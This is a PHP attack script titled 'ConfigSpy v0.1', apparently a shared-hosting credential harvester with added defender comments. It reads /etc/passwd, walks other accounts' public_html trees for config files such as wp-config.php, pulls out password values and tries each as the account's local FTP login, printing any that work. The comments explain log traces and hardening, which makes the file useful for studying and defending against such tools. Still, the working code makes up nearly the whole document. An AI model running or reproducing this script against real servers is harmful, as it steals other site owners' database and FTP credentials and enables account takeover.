<?php
// ConfigSpy v0.1 (name taken from the <title> below): a server-side script that
// enumerates local accounts, walks each account's public_html tree for files with
// common config-file names, extracts a password-like value from each, and tries
// that value as the account's FTP password on the same host.
// The comments in this listing describe the observable behaviour of each stage,
// where it shows up in logs, and which hardening makes the stage fail.
echo "<html>";
// The title is a fixed string, so it can be searched for both in files under the
// web root and in captured HTTP responses.
echo "<title>-r@ Crew ConfigSpy v0.1</title><body>";
 
// Removes PHP's execution time limit so the recursive filesystem walk is not cut short.
set_time_limit(0);
##################
// Stage 1 - account enumeration.
// The '@' suppresses the warning if the open fails. Where open_basedir confines the
// PHP process to the site's own tree, this fopen() fails and the script stops at
// the exit below.
@$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
echo "[-] Error : coudn't read /etc/passwd";
exit;
}
$path_to_public=array();
$users=array();
// $pathtoconf is initialised here but not referenced again in this listing.
$pathtoconf=array();
$i=0;
 
while(!feof($passwd)) {
$str=fgets($passwd);
// The first 36 lines ($i = 0..35) are skipped - presumably to pass over system
// accounts; the cut-off is a fixed line count, not a UID check.
if ($i>35) {
// The username is the text before the first ':' of the passwd line.
$pos=strpos($str,":");
$username=substr($str,0,$pos);
// The web root is assumed to be /home/<user>/public_html/; the home-directory
// field of the passwd entry is not read.
$dirz="/home/$username/public_html/";
if (($username!="")) {
// is_readable() only succeeds when the identity the PHP process runs as can read
// the directory. Where each site's PHP runs under its own account and home
// directories are not readable by other users, nothing is collected here.
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################
 
#########################
echo "<br><br>";
// Results are echoed into a <textarea> in the HTTP response; this listing does not
// write them to disk or send them to another host.
echo "<textarea name='main_window' cols=100 rows=20>";
 
// Both counters report the same number: $users and $path_to_public are always
// pushed together, and only for accounts whose public_html was readable.
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories\n";
 
echo "[~] Searching for passwords in config.* files...\n\n";
// Stage 2 - one recursive scan per collected account (see read_dir()).
foreach ($users as $user) {
$path="/home/$user/public_html/";
read_dir($path,$user);
}
 
echo "\n[+] Done\n";

/**
 * Recursively walks $path. For every readable regular file whose name is on a fixed
 * list (config.php, config.inc.php, db.inc.php, connect.php, wp-config.php, var.php,
 * configure.php, db.php, db_connect.php) it calls get_pass(); when that returns a
 * non-empty value it prints the file path and the value, then hands the value to
 * ftp_check() together with $username.
 *
 * Defender notes:
 * - Every step is gated by is_readable()/opendir() under the PHP process's identity.
 *   Config files readable only by their owning account, combined with PHP running
 *   per account, leave this function with nothing to open.
 * - A single web-server process listing many accounts' trees and opening their
 *   config files in a short window is the access pattern to look for in file-access
 *   auditing.
 *
 * @param string $path     Directory to scan; entry names are appended directly, so it
 *                         is expected to end in '/'.
 * @param string $username Account the tree belongs to; forwarded unchanged to ftp_check().
 */
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath="$path$file";
if (($file!='.') and ($file!='..')) {
if (is_readable($fpath)) {
// A trailing '/' is appended before the is_dir() test; directories are descended
// into, anything else is treated as a candidate file.
$dr="$fpath/";
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
// Exact, case-sensitive file-name match against the fixed list.
if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
$pass=get_pass($fpath);
// get_pass() returns nothing when no line matched; the loose comparison with ''
// treats that as empty and skips the file.
if ($pass!='') {
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
// NOTE(review): $handle is not passed to closedir() anywhere in this function.
}
}

/**
 * Returns a substring of the first line in the file $link that contains the text
 * 'pass' (the additional 'password' and 'passwd' tests are covered by the same match).
 *
 * The substring starts 3 characters after the first '=' on that line and runs up to
 * the last '"' on the line, or up to the last "'" when strrpos() reports no '"'
 * (or reports it at offset 0). This presumably assumes an assignment written as
 * `name = "value"`; other layouts yield a shifted or empty result.
 *
 * When no line matches, the function ends without a return statement.
 * The fopen() result is not checked and the handle is not closed in this function.
 *
 * Defender note: what this reads is a plaintext secret stored in a file under the
 * web root that another local identity is able to open. File permissions that
 * exclude other accounts, or keeping the secret outside the web root, remove the input.
 *
 * @param string $link Path of the file to read.
 * @return mixed The extracted substring, or nothing when no line contains 'pass'.
 */
function get_pass($link) {
// '@' hides the warning if the file cannot be opened.
@$config=fopen($link,'r');
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) {
// Double-quoted value if a '"' is found past offset 0, otherwise single-quoted.
if (strrpos($line,'"'))
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
else
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
// Only the first matching line is used; the rest of the file is not read.
return $pass;
}
}
}

/**
 * Attempts an FTP login on 127.0.0.1 (ftp_connect() default port, 21) with $login and
 * $pass, and prints a "[FTP] login:pass Success" line when the server accepts it.
 * Nothing is printed when the connection or the login fails.
 *
 * Defender notes:
 * - This is a password-reuse test: the value taken from an application config file
 *   is tried as the password of the system account that owns the web root. Distinct
 *   credentials for the application/database and for the account make it fail.
 * - Each extracted value produces one FTP authentication attempt whose source is
 *   the loopback address. FTP auth logs show these as logins from 127.0.0.1 across
 *   many usernames; brute-force protection that exempts localhost will not count them.
 *
 * @param string $login Account name to authenticate as.
 * @param string $pass  Value returned by get_pass() for one of that account's files.
 */
function ftp_check($login,$pass) {
// '@' suppresses connection and login warnings, so failures leave no PHP output.
@$ftp=ftp_connect('127.0.0.1');
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo '[FTP] '.$login.':'.$pass." Success\n";
}
// The connection is closed only on a failed login; after a successful one it is
// not closed by this function.
else ftp_quit($ftp);
}
}

// Closes the result <textarea> and the HTML page. These statements follow the
// function definitions in the file and run after the top-level scan loop has finished.
echo "</textarea><br>";
 
echo "</body></html>";
?>